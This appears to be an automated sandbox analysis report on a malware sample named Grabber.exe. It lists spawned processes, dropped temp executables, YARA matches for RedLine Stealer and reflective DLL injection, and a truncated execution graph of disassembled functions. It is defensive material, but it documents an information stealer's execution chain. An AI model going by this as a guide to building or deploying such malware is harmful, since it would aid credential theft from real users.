                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7a91b0000
                                                                                                                                                                                                                        File size:632'808 bytes
                                                                                                                                                                                                                        MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\svchost.exe"
Imagebase:0x7ff7e52b0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation:high
Has exited:false

Target ID:7
Start time:03:11:57
Start date:15/12/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff674740000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:high
Has exited:false

Target ID:8
Start time:03:11:57
Start date:15/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"
Imagebase:0x7ff7b4ba0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:03:11:57
Start date:15/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:03:12:07
Start date:15/12/2024
Path:C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe"
Imagebase:0xe50000
File size:307'712 bytes
MD5 hash:7B6730CA4DA283A35C41B831B9567F15
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation:low
Has exited:true

Target ID:11
Start time:03:12:08
Start date:15/12/2024
Path:C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
Imagebase:0x7ff7dbd50000
File size:307'712 bytes
MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:12
Start time:03:12:08
Start date:15/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\svchost.exe"
Imagebase:0x7ff7e52b0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:03:12:08
Start date:15/12/2024
Path:C:\Windows\System32\audiodg.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\audiodg.exe"
Imagebase:0x7ff7a91b0000
File size:632'808 bytes
MD5 hash:627DEA21175691FDE4495877C53B4C87
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:03:12:08
Start date:15/12/2024
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\msiexec.exe"
Imagebase:0x7ff775ae0000
File size:69'632 bytes
MD5 hash:E5DA170027542E25EDE42FC54C929077
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:03:12:16
Start date:15/12/2024
Path:C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
Imagebase:0x7ff6068e0000
File size:307'712 bytes
MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:03:12:16
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                        Start time:03:12:16
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff7a91b0000
                                                                                                                                                                                                                        File size:632'808 bytes
                                                                                                                                                                                                                        MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                        Start time:03:12:16
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff775ae0000
                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                        Start time:03:12:18
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff641f20000
                                                                                                                                                                                                                        File size:5'915'958 bytes
                                                                                                                                                                                                                        MD5 hash:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 34%, ReversingLabs
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                        Start time:03:12:19
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff641f20000
                                                                                                                                                                                                                        File size:5'915'958 bytes
                                                                                                                                                                                                                        MD5 hash:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:12%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:6.2%
                                                                                                                                                                                                                          Total number of Nodes:1149
                                                                                                                                                                                                                          Total number of Limit Nodes:11
5564 7ff79cd61e0c 5512->5564 5514 7ff79cd61e51 5514->5485 5516 7ff79cd65678 5515->5516 5517 7ff79cd61969 5515->5517 5518 7ff79cd65696 GetModuleFileNameW 5516->5518 5519 7ff79cd65680 5516->5519 5517->5491 5541 7ff79cd61f20 InitializeSListHead 5517->5541 5523 7ff79cd656c1 std::_Xinvalid_argument 5518->5523 5520 7ff79cd670d4 _set_fmode 11 API calls 5519->5520 5521 7ff79cd65685 5520->5521 5522 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5521->5522 5522->5517 5579 7ff79cd655f8 5523->5579 5526 7ff79cd65709 5527 7ff79cd670d4 _set_fmode 11 API calls 5526->5527 5528 7ff79cd6570e 5527->5528 5530 7ff79cd6716c __free_lconv_num 11 API calls 5528->5530 5529 7ff79cd65743 5533 7ff79cd6716c __free_lconv_num 11 API calls 5529->5533 5532 7ff79cd6571c 5530->5532 5531 7ff79cd65721 std::_Xinvalid_argument 5531->5529 5534 7ff79cd65788 5531->5534 5535 7ff79cd6576f 5531->5535 5532->5517 5533->5517 5538 7ff79cd6716c __free_lconv_num 11 API calls 5534->5538 5536 7ff79cd6716c __free_lconv_num 11 API calls 5535->5536 5537 7ff79cd65778 5536->5537 5539 7ff79cd6716c __free_lconv_num 11 API calls 5537->5539 5538->5529 5540 7ff79cd65784 5539->5540 5540->5517 5543 7ff79cd618a0 5542->5543 5544 7ff79cd62cb1 5542->5544 5543->5496 5544->5543 5545 7ff79cd62ce6 5544->5545 5548 7ff79cd6665c 5544->5548 5557 7ff79cd665f0 5545->5557 5549 7ff79cd66669 5548->5549 5550 7ff79cd66673 5548->5550 5549->5550 5555 7ff79cd6668e 5549->5555 5551 7ff79cd670d4 _set_fmode 11 API calls 5550->5551 5552 7ff79cd6667a 5551->5552 5553 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5552->5553 5554 7ff79cd66686 5553->5554 5554->5545 5555->5554 5556 7ff79cd670d4 _set_fmode 11 API calls 5555->5556 5556->5552 5558 7ff79cd6716c 5557->5558 5559 7ff79cd671a2 5558->5559 5560 7ff79cd67171 HeapFree 5558->5560 5559->5543 5560->5559 5561 7ff79cd6718c GetLastError 5560->5561 5562 7ff79cd67199 __free_lconv_num 5561->5562 5563 7ff79cd670d4 _set_fmode 11 API calls 5562->5563 5563->5559 5565 7ff79cd61e26 5564->5565 5567 7ff79cd61e1f 
std::_Xinvalid_argument 5564->5567 5568 7ff79cd66404 5565->5568 5567->5514 5571 7ff79cd66040 5568->5571 5578 7ff79cd68588 EnterCriticalSection 5571->5578 5580 7ff79cd65610 5579->5580 5584 7ff79cd65648 5579->5584 5581 7ff79cd670f4 _set_fmode 11 API calls 5580->5581 5580->5584 5582 7ff79cd6563e 5581->5582 5583 7ff79cd6716c __free_lconv_num 11 API calls 5582->5583 5583->5584 5584->5526 5584->5531 5586 7ff79cd620e7 GetStartupInfoW 5585->5586 5586->5145 5590 7ff79cd61563 5587->5590 5588 7ff79cd61666 5647 7ff79cd61158 5588->5647 5590->5588 5592 7ff79cd61660 5590->5592 5593 7ff79cd6161e 5590->5593 5594 7ff79cd615ca 5590->5594 5597 7ff79cd61586 5590->5597 5641 7ff79cd610c0 5592->5641 5596 7ff79cd61bb0 51 API calls 5593->5596 5594->5592 5627 7ff79cd61bb0 5594->5627 5596->5597 5597->5174 5602 7ff79cd614e7 5601->5602 5603 7ff79cd61510 5601->5603 5602->5603 5604 7ff79cd651bc _invalid_parameter_noinfo_noreturn 47 API calls 5602->5604 5603->5178 5605 7ff79cd61534 5604->5605 5607 7ff79cd61197 CreateFileW 5606->5607 5608 7ff79cd61194 5606->5608 5609 7ff79cd611cc WriteFile CloseHandle 5607->5609 5610 7ff79cd611c8 5607->5610 5608->5607 5609->5610 5611 7ff79cd61b90 _log10_special 8 API calls 5610->5611 5612 7ff79cd61210 5611->5612 5612->5183 5614 7ff79cd61808 5613->5614 5617 7ff79cd616a4 5613->5617 5615 7ff79cd61158 63 API calls 5614->5615 5616 7ff79cd6180e 5615->5616 5618 7ff79cd61802 5617->5618 5619 7ff79cd6173e 5617->5619 5620 7ff79cd616e3 5617->5620 5624 7ff79cd616f8 5617->5624 5622 7ff79cd610c0 Concurrency::cancel_current_task 51 API calls 5618->5622 5621 7ff79cd61bb0 51 API calls 5619->5621 5620->5618 5623 7ff79cd61bb0 51 API calls 5620->5623 5621->5624 5622->5614 5623->5624 5625 7ff79cd651bc _invalid_parameter_noinfo_noreturn 47 API calls 5624->5625 5626 7ff79cd617b6 5624->5626 5625->5618 5626->5176 5628 7ff79cd61bbb 5627->5628 5629 7ff79cd615df 5628->5629 5630 7ff79cd65fc0 _set_fmode 2 API calls 5628->5630 5631 7ff79cd61bda 5628->5631 5629->5597 5636 7ff79cd651bc 5629->5636 
5630->5628 5634 7ff79cd61be5 5631->5634 5650 7ff79cd623c8 5631->5650 5633 7ff79cd610c0 Concurrency::cancel_current_task 51 API calls 5635 7ff79cd61beb 5633->5635 5634->5633 5637 7ff79cd65034 _invalid_parameter_noinfo_noreturn 47 API calls 5636->5637 5638 7ff79cd651d5 5637->5638 5639 7ff79cd651ec _invalid_parameter_noinfo_noreturn 17 API calls 5638->5639 5640 7ff79cd651ea 5639->5640 5642 7ff79cd610ce std::bad_alloc::bad_alloc 5641->5642 5643 7ff79cd62eac std::_Xinvalid_argument 2 API calls 5642->5643 5644 7ff79cd610df 5643->5644 5645 7ff79cd62c90 __std_exception_copy 49 API calls 5644->5645 5646 7ff79cd61109 5645->5646 5646->5588 5648 7ff79cd618f0 std::_Xinvalid_argument 63 API calls 5647->5648 5649 7ff79cd61168 5648->5649 5651 7ff79cd623d6 std::bad_alloc::bad_alloc 5650->5651 5652 7ff79cd62eac std::_Xinvalid_argument 2 API calls 5651->5652 5653 7ff79cd623e7 5652->5653 5951 7ff79cd62178 5952 7ff79cd621ac 5951->5952 5953 7ff79cd62190 5951->5953 5953->5952 5960 7ff79cd62e78 5953->5960 5958 7ff79cd665c4 47 API calls 5959 7ff79cd621d2 5958->5959 5961 7ff79cd63200 _CreateFrameInfo 58 API calls 5960->5961 5962 7ff79cd621be 5961->5962 5963 7ff79cd62e8c 5962->5963 5964 7ff79cd63200 _CreateFrameInfo 58 API calls 5963->5964 5965 7ff79cd621ca 5964->5965 5965->5958 6323 7ff79cd6ca38 6324 7ff79cd6ca49 CloseHandle 6323->6324 6325 7ff79cd6ca4f 6323->6325 6324->6325 5705 7ff79cd66a04 5706 7ff79cd66a09 5705->5706 5707 7ff79cd66a1e 5705->5707 5711 7ff79cd66a24 5706->5711 5712 7ff79cd66a66 5711->5712 5713 7ff79cd66a6e 5711->5713 5715 7ff79cd6716c __free_lconv_num 11 API calls 5712->5715 5714 7ff79cd6716c __free_lconv_num 11 API calls 5713->5714 5716 7ff79cd66a7b 5714->5716 5715->5713 5717 7ff79cd6716c __free_lconv_num 11 API calls 5716->5717 5718 7ff79cd66a88 5717->5718 5719 7ff79cd6716c __free_lconv_num 11 API calls 5718->5719 5720 7ff79cd66a95 5719->5720 5721 7ff79cd6716c __free_lconv_num 11 API calls 5720->5721 5722 7ff79cd66aa2 5721->5722 5723 7ff79cd6716c __free_lconv_num 11 API 
calls 5722->5723 5724 7ff79cd66aaf 5723->5724 5725 7ff79cd6716c __free_lconv_num 11 API calls 5724->5725 5726 7ff79cd66abc 5725->5726 5727 7ff79cd6716c __free_lconv_num 11 API calls 5726->5727 5728 7ff79cd66ac9 5727->5728 5729 7ff79cd6716c __free_lconv_num 11 API calls 5728->5729 5730 7ff79cd66ad9 5729->5730 5731 7ff79cd6716c __free_lconv_num 11 API calls 5730->5731 5732 7ff79cd66ae9 5731->5732 5737 7ff79cd668d4 5732->5737 5751 7ff79cd68588 EnterCriticalSection 5737->5751 5753 7ff79cd64304 5754 7ff79cd63200 _CreateFrameInfo 58 API calls 5753->5754 5755 7ff79cd64339 5754->5755 5756 7ff79cd63200 _CreateFrameInfo 58 API calls 5755->5756 5757 7ff79cd64347 __except_validate_context_record 5756->5757 5758 7ff79cd63200 _CreateFrameInfo 58 API calls 5757->5758 5759 7ff79cd6438b 5758->5759 5760 7ff79cd63200 _CreateFrameInfo 58 API calls 5759->5760 5761 7ff79cd64394 5760->5761 5762 7ff79cd63200 _CreateFrameInfo 58 API calls 5761->5762 5763 7ff79cd6439d 5762->5763 5776 7ff79cd62b20 5763->5776 5766 7ff79cd63200 _CreateFrameInfo 58 API calls 5767 7ff79cd643cd __CxxCallCatchBlock 5766->5767 5768 7ff79cd62b5c __CxxCallCatchBlock 58 API calls 5767->5768 5772 7ff79cd6447e 5768->5772 5769 7ff79cd644a7 __CxxCallCatchBlock 5770 7ff79cd63200 _CreateFrameInfo 58 API calls 5769->5770 5771 7ff79cd644ba 5770->5771 5773 7ff79cd63200 _CreateFrameInfo 58 API calls 5771->5773 5772->5769 5774 7ff79cd62dbc __CxxCallCatchBlock 58 API calls 5772->5774 5775 7ff79cd644c3 5773->5775 5774->5769 5777 7ff79cd63200 _CreateFrameInfo 58 API calls 5776->5777 5778 7ff79cd62b31 5777->5778 5779 7ff79cd63200 _CreateFrameInfo 58 API calls 5778->5779 5780 7ff79cd62b3c 5778->5780 5779->5780 5781 7ff79cd63200 _CreateFrameInfo 58 API calls 5780->5781 5782 7ff79cd62b4d 5781->5782 5782->5766 5782->5767 5966 7ff79cd66e84 5967 7ff79cd66e94 5966->5967 5968 7ff79cd66e9f __vcrt_uninitialize_ptd 5967->5968 5969 7ff79cd66cfc _set_fmode 11 API calls 5967->5969 5969->5968 5970 7ff79cd66484 5973 7ff79cd659e4 5970->5973 5980 
7ff79cd659ac 5973->5980 5978 7ff79cd65968 11 API calls 5979 7ff79cd65a17 5978->5979 5981 7ff79cd659bc 5980->5981 5982 7ff79cd659c1 5980->5982 5983 7ff79cd65968 11 API calls 5981->5983 5984 7ff79cd659c8 5982->5984 5983->5982 5985 7ff79cd659dd 5984->5985 5986 7ff79cd659d8 5984->5986 5985->5978 5987 7ff79cd65968 11 API calls 5986->5987 5987->5985 6326 7ff79cd6a144 6327 7ff79cd6a16e 6326->6327 6328 7ff79cd670f4 _set_fmode 11 API calls 6327->6328 6329 7ff79cd6a18d 6328->6329 6330 7ff79cd6716c __free_lconv_num 11 API calls 6329->6330 6331 7ff79cd6a19b 6330->6331 6332 7ff79cd670f4 _set_fmode 11 API calls 6331->6332 6336 7ff79cd6a1c5 6331->6336 6334 7ff79cd6a1b7 6332->6334 6335 7ff79cd6716c __free_lconv_num 11 API calls 6334->6335 6335->6336 6337 7ff79cd6a1ce 6336->6337 6338 7ff79cd69728 6336->6338 6339 7ff79cd694f4 5 API calls 6338->6339 6340 7ff79cd6975e 6339->6340 6341 7ff79cd6977d InitializeCriticalSectionAndSpinCount 6340->6341 6342 7ff79cd69763 6340->6342 6341->6342 6342->6336 5783 7ff79cd61000 5784 7ff79cd62c90 __std_exception_copy 49 API calls 5783->5784 5785 7ff79cd61029 5784->5785 5786 7ff79cd6d700 5787 7ff79cd6d738 __GSHandlerCheckCommon 5786->5787 5788 7ff79cd6d764 5787->5788 5790 7ff79cd62c08 5787->5790 5791 7ff79cd63200 _CreateFrameInfo 58 API calls 5790->5791 5792 7ff79cd62c32 5791->5792 5793 7ff79cd63200 _CreateFrameInfo 58 API calls 5792->5793 5794 7ff79cd62c3f 5793->5794 5795 7ff79cd63200 _CreateFrameInfo 58 API calls 5794->5795 5796 7ff79cd62c48 5795->5796 5796->5788 5988 7ff79cd6e280 5991 7ff79cd65234 5988->5991 5992 7ff79cd66cfc _set_fmode 11 API calls 5991->5992 5993 7ff79cd65252 5992->5993 5994 7ff79cd6d780 6004 7ff79cd62f54 5994->6004 5996 7ff79cd6d7a8 5998 7ff79cd63200 _CreateFrameInfo 58 API calls 5999 7ff79cd6d7b8 5998->5999 6000 7ff79cd63200 _CreateFrameInfo 58 API calls 5999->6000 6001 7ff79cd6d7c1 6000->6001 6002 7ff79cd665c4 47 API calls 6001->6002 6003 7ff79cd6d7ca 6002->6003 6006 7ff79cd62f84 __CxxCallCatchBlock _IsNonwritableInCurrentImage 
__except_validate_context_record 6004->6006 6005 7ff79cd63085 6005->5996 6005->5998 6006->6005 6007 7ff79cd63048 RtlUnwindEx 6006->6007 6007->6006 6343 7ff79cd68540 6344 7ff79cd68548 6343->6344 6345 7ff79cd69728 6 API calls 6344->6345 6346 7ff79cd68579 6344->6346 6347 7ff79cd68575 6344->6347 6345->6344 6349 7ff79cd685a4 6346->6349 6350 7ff79cd685cf 6349->6350 6351 7ff79cd685d3 6350->6351 6352 7ff79cd685b2 DeleteCriticalSection 6350->6352 6351->6347 6352->6350 6353 7ff79cd6c24b 6354 7ff79cd6c28b 6353->6354 6355 7ff79cd6c4f0 6353->6355 6354->6355 6357 7ff79cd6c2bf 6354->6357 6358 7ff79cd6c4d2 6354->6358 6356 7ff79cd6c4e6 6355->6356 6360 7ff79cd6d000 _log10_special 19 API calls 6355->6360 6361 7ff79cd6d000 6358->6361 6360->6356 6364 7ff79cd6d020 6361->6364 6365 7ff79cd6d03a 6364->6365 6366 7ff79cd6d01b 6365->6366 6368 7ff79cd6ce60 6365->6368 6366->6356 6369 7ff79cd6cea0 _raise_exc _log10_special 6368->6369 6370 7ff79cd6cf49 6369->6370 6371 7ff79cd6cf19 6369->6371 6381 7ff79cd6d450 6370->6381 6377 7ff79cd6cd3c 6371->6377 6374 7ff79cd6cf47 _log10_special 6375 7ff79cd61b90 _log10_special 8 API calls 6374->6375 6376 7ff79cd6cf71 6375->6376 6376->6366 6378 7ff79cd6cd80 _log10_special 6377->6378 6379 7ff79cd6cd95 6378->6379 6380 7ff79cd6d450 _log10_special 11 API calls 6378->6380 6379->6374 6380->6379 6382 7ff79cd6d459 6381->6382 6383 7ff79cd6d470 6381->6383 6385 7ff79cd670d4 _set_fmode 11 API calls 6382->6385 6386 7ff79cd6d468 6382->6386 6384 7ff79cd670d4 _set_fmode 11 API calls 6383->6384 6384->6386 6385->6386 6386->6374 5114 7ff79cd65c0d 5126 7ff79cd665c4 5114->5126 5116 7ff79cd65c12 5117 7ff79cd65c39 GetModuleHandleW 5116->5117 5118 7ff79cd65c83 5116->5118 5117->5118 5123 7ff79cd65c46 5117->5123 5119 7ff79cd65b10 11 API calls 5118->5119 5120 7ff79cd65cbf 5119->5120 5121 7ff79cd65cc6 5120->5121 5122 7ff79cd65cdc 11 API calls 5120->5122 5124 7ff79cd65cd8 5122->5124 5123->5118 5125 7ff79cd65d34 GetModuleHandleExW GetProcAddress FreeLibrary 5123->5125 5125->5118 5127 
7ff79cd66b84 std::_Xinvalid_argument 47 API calls 5126->5127 5128 7ff79cd665cd 5127->5128 5129 7ff79cd66604 __GetCurrentState 47 API calls 5128->5129 5130 7ff79cd665ed 5129->5130 5800 7ff79cd6830c GetCommandLineA GetCommandLineW 6387 7ff79cd61048 6390 7ff79cd62d20 6387->6390 6389 7ff79cd6106a 6391 7ff79cd62d37 6390->6391 6392 7ff79cd62d2f 6390->6392 6391->6389 6393 7ff79cd665f0 __std_exception_copy 13 API calls 6392->6393 6393->6391 5801 7ff79cd69908 5802 7ff79cd69941 5801->5802 5803 7ff79cd69912 5801->5803 5803->5802 5804 7ff79cd69927 FreeLibrary 5803->5804 5804->5803 6008 7ff79cd64690 6017 7ff79cd645c3 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6008->6017 6009 7ff79cd646b7 6010 7ff79cd63200 _CreateFrameInfo 58 API calls 6009->6010 6012 7ff79cd646bc 6010->6012 6011 7ff79cd646f2 6013 7ff79cd66604 __GetCurrentState 47 API calls 6011->6013 6014 7ff79cd63200 _CreateFrameInfo 58 API calls 6012->6014 6016 7ff79cd646c7 6012->6016 6013->6016 6014->6016 6015 7ff79cd646d4 __FrameHandler3::GetHandlerSearchState 6016->6015 6018 7ff79cd66604 __GetCurrentState 47 API calls 6016->6018 6017->6009 6017->6011 6020 7ff79cd62bb0 58 API calls Is_bad_exception_allowed 6017->6020 6022 7ff79cd62bd8 6017->6022 6019 7ff79cd646fd 6018->6019 6020->6017 6023 7ff79cd63200 _CreateFrameInfo 58 API calls 6022->6023 6024 7ff79cd62be6 6023->6024 6024->6017 5896 7ff79cd68bd0 5897 7ff79cd68bdc 5896->5897 5898 7ff79cd68c03 5897->5898 5900 7ff79cd68704 5897->5900 5901 7ff79cd68709 5900->5901 5902 7ff79cd68744 5900->5902 5903 7ff79cd6873c 5901->5903 5904 7ff79cd6872a DeleteCriticalSection 5901->5904 5902->5897 5905 7ff79cd6716c __free_lconv_num 11 API calls 5903->5905 5904->5903 5904->5904 5905->5902 4836 7ff79cd657dc 4837 7ff79cd657f5 4836->4837 4838 7ff79cd657f1 4836->4838 4849 7ff79cd684a4 GetEnvironmentStringsW 4837->4849 4841 7ff79cd6580e 4856 7ff79cd6584c 4841->4856 4842 7ff79cd65802 4875 7ff79cd6716c 4842->4875 4846 7ff79cd6716c __free_lconv_num 11 API calls 4847 7ff79cd65835 
4846->4847 4848 7ff79cd6716c __free_lconv_num 11 API calls 4847->4848 4848->4838 4850 7ff79cd657fa 4849->4850 4851 7ff79cd684c8 4849->4851 4850->4841 4850->4842 4881 7ff79cd68ec4 4851->4881 4853 7ff79cd684ff 4854 7ff79cd6716c __free_lconv_num 11 API calls 4853->4854 4855 7ff79cd6851f FreeEnvironmentStringsW 4854->4855 4855->4850 4857 7ff79cd65874 4856->4857 4858 7ff79cd670f4 _set_fmode 11 API calls 4857->4858 4870 7ff79cd658af 4858->4870 4859 7ff79cd658b7 4860 7ff79cd6716c __free_lconv_num 11 API calls 4859->4860 4861 7ff79cd65816 4860->4861 4861->4846 4862 7ff79cd65931 4863 7ff79cd6716c __free_lconv_num 11 API calls 4862->4863 4863->4861 4864 7ff79cd670f4 _set_fmode 11 API calls 4864->4870 4865 7ff79cd65920 4953 7ff79cd65968 4865->4953 4869 7ff79cd6716c __free_lconv_num 11 API calls 4869->4859 4870->4859 4870->4862 4870->4864 4870->4865 4871 7ff79cd65954 4870->4871 4872 7ff79cd6716c __free_lconv_num 11 API calls 4870->4872 4944 7ff79cd66ee4 4870->4944 4959 7ff79cd651ec IsProcessorFeaturePresent 4871->4959 4872->4870 4876 7ff79cd671a2 4875->4876 4877 7ff79cd67171 HeapFree 4875->4877 4876->4838 4877->4876 4878 7ff79cd6718c GetLastError 4877->4878 4879 7ff79cd67199 __free_lconv_num 4878->4879 4880 7ff79cd670d4 _set_fmode 9 API calls 4879->4880 4880->4876 4882 7ff79cd68f0f 4881->4882 4887 7ff79cd68ed3 _set_fmode 4881->4887 4892 7ff79cd670d4 4882->4892 4884 7ff79cd68ef6 HeapAlloc 4885 7ff79cd68f0d 4884->4885 4884->4887 4886 7ff79cd68f14 4885->4886 4886->4853 4887->4882 4887->4884 4889 7ff79cd65fc0 4887->4889 4895 7ff79cd66000 4889->4895 4901 